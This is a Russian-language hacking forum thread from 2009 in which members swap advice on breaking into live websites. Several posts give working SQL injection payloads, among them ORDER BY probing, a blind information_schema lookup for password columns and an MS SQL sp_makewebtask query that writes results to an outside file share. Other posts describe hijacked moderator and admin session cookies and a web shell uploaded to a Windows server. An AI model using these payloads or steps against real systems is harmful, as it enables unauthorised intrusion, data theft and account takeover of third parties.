Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. smth

    smth New Member

    Joined:
    14 Sep 2009
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Там экранирование просто.
     
    1 person likes this.
  2. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    Ясненько. В этом направлении и думал.

    А вот в этом скрипте инклюд конечно более важен, у меня есть исходники этого скрипта, не нашёл в нём никаких проверок на фильтрацию.. (.. /)

    Может какой мод стоить или какая настройка апатча\пхп? Просто есть два хоста с этой тулзой, на обоих одинаковый результат при подставлении ../../ Пробывал url endec, результат такой же.
     
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Database query errorYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 limit 0,50' at line 1

    вылазит при &script=post+order+by+1

    за SQL - inj можно считать? и если да, то как ее реализовать

    PS при этом имею к примеру


    при &script=post все норма,
    а если стави &script=post1

    пишет Database query errorUnknown column 'post1 in 'order clause'
     
    _________________________
    #9103 HAXTA4OK, 1 Oct 2009
    Last edited: 1 Oct 2009
  4. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    order by $script limit 0,50:
    =>near 'order by 1 limit 0,50'
    =>Unknown column 'post1 in 'order clause'
    https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
    https://forum.antichat.ru/threadnav35207-1-10.html
     
    4 people like this.
  5. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Помогите плиз сформировать запрос по этому:
    А то, что-то не выходит сделать вывод печатного поля ((
     
  6. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    такой вопрос, имею слепую, знаю колонки , какой составить запрос что бы искать посимвольно имя таблицу в которой есть колока к примеру pass??

    :)

    ЗЫ ElteRUS От тебя жду ответа =)
     
    _________________________
    #9106 HAXTA4OK, 2 Oct 2009
    Last edited: 2 Oct 2009
  7. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    ...(select table_name from information_schema.columns where column_name like 0x257061737325 limit 0,1)...
     
    1 person likes this.
  8. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Есть инъекция в MS SQL
    Но отключен вывод ошибок

    Что можно сделать?
    Може как-то как в MySQL с union select 1,2,3,4?
     
    #9108 Byrger, 2 Oct 2009
    Last edited: 2 Oct 2009
  9. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Смотри пункт 3.4 на http://forum.xaknet.ru/thread4556.html
    Лично мне такое еще не попадалось.
     
  10. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    Что-то мне сегодня захотелось сделать что-нибудь полезное :)
    Можно использовать sp_makewebtask, чтобы записать ваш запрос в HTML:

    '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

    Указываемый IP должен иметь папку "share" с доступом для Everyone.

    Хотя помнится я как-то и с union select развлекался, правда в postgres sql но погоды это не делает, ибо что в постгрис что в мсскл нужно чтобы типы всех параметров совпадали, так что не компостируй себе мозГ, читай http://www.securitylab.ru/analytics/216211.php
     
  11. Roston

    Roston Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    337
    Likes Received:
    104
    Reputations:
    8
    здрасте всем... нашёл пасивку на одном ресурсе... суть такова, стоит самописный сайт и пхпбб. дело в том что юзеры на сайте и на форуме логинятся под одним ником, кукисы такие как у пхпбб. дело в том что смог угнать модера
    куки у него вот такого вида
    Code:
    iua=1; b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; ; phpbb2mysql_sid=dc4b2038e838e83c1789c49dc4960b4d
    Потом смог же заманить на пасивку и админа но у него в куках присутствует еше какое то поле
    Code:
    ; phpbb2mysql_sid=6c5ea6d3269f4ba89585ecb7547090db; [b][color=red]phpbb2mysql_t=a:2:{i:12062;i:1254481197;i:12078;i:1254507094;};[/b][/color] phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";i:-1;}; iua=1; b=b
    Вот вопрос, как мне в опере или в другом браузере добавить такое поле? в опере на сколько я понял можно менять существующие поля, но новые создавать нельзя...
    з.ы. пробовал переименововать поле b но ничего не получалось, после обновления страницы я становился неавторизованым
     
    1 person likes this.
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    у Fire Fox есть такой плагин - cookie editor называется. Вот там и добавляется все спокойно

    https://addons.mozilla.org/en-US/firefox/addon/573
     
    1 person likes this.
  13. brodobra

    brodobra New Member

    Joined:
    3 Oct 2009
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Есть ли прога, которая из имеющегося текстового списка брала слова, вставляла бы их в окошко клиента (чат, к примеру) и нажимала/кликала Ввод ?
     
    1 person likes this.
  14. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    AutoHotKey
    Xedant Human Emulator
     
    1 person likes this.
  15. eNergy

    eNergy Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    149
    Likes Received:
    32
    Reputations:
    -5
    ломаю сайт при пподстановки ковычки пишет
    какой еще рефер нужен перебрал столбцы до 30 все одно и тоже

    не катиткак ты говоришь бейсик авторизация
     
    1 person likes this.
  16. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    чето я проблемы не вижу
    ' order by 1--
    ' order by 999--
    не?
     
    2 people like this.
  17. imgreen

    imgreen New Member

    Joined:
    15 Nov 2008
    Messages:
    12
    Likes Received:
    3
    Reputations:
    -5
    Если отключен вывод ошибок, то для проведение SQL inj только benchmark?
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Бред какой-то. Есть еще ряд показателей, уникальных в каждом случае, которые просто надо уметь видеть. Если есть иньекция, и она блайнд - это не значит, что тот, кто её делает, должен быть слеп

    - перенаправление на другую старницу
    - изменение содержимого страницы
    - ........
    ...........
    и etc.
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    не надо делать из меня дурака:

     
  20. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    появился шелл,на вин 2003/ISS 6.0,редактировать файлы прав нету,на созданные файлы шеллом даже права 777 не ставит,что это может быть? зиливал скрипитом через пхпадмин,это первый раз такое..
     
Thread Status:
Not open for further replies.